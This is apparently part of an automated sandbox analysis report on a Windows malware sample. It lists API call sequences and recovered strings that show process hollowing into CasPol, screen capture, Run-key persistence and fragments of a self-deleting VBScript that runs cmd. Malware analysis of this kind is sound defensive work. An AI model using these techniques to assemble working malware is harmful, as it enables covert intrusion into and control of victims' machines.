                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434403), ref: 0043A76C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                            • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                            • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 00442575
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 0044257C
                                                                                                            • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                            • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                            • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .
                                                                                                            • API String ID: 0-248832578
                                                                                                            • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                            • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                            • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                            • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID: <D
                                                                                                            • API String ID: 1084509184-3866323178
                                                                                                            • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                            • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                            • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                            • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID: <D
                                                                                                            • API String ID: 1084509184-3866323178
                                                                                                            • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                            • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                            • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                            • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                            • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                            • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 1663032902-0
                                                                                                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                            • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                            • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2692324296-0
                                                                                                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                            • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                            • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                            APIs
                                                                                                              • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                            • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1272433827-0
                                                                                                            • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                            • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                            • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                            • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1084509184-0
                                                                                                            • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                            • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                            • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                            • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 54951025-0
                                                                                                            APIs
                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                              • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                            • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                            • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                            • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                            • DeleteObject.GDI32(?), ref: 00418107
                                                                                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                            • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                            • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                            • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                            • DeleteDC.GDI32(?), ref: 00418398
                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                            • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                            • String ID: DISPLAY
                                                                                                            • API String ID: 1765752176-865373369
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                            • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                            • API String ID: 4188446516-108836778
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                              • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                                              • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                                              • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                            • API String ID: 4250697656-2665858469
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                            • API String ID: 1861856835-3168347843
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
• ExitProcess.KERNEL32 ref: 0040C287
Strings
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
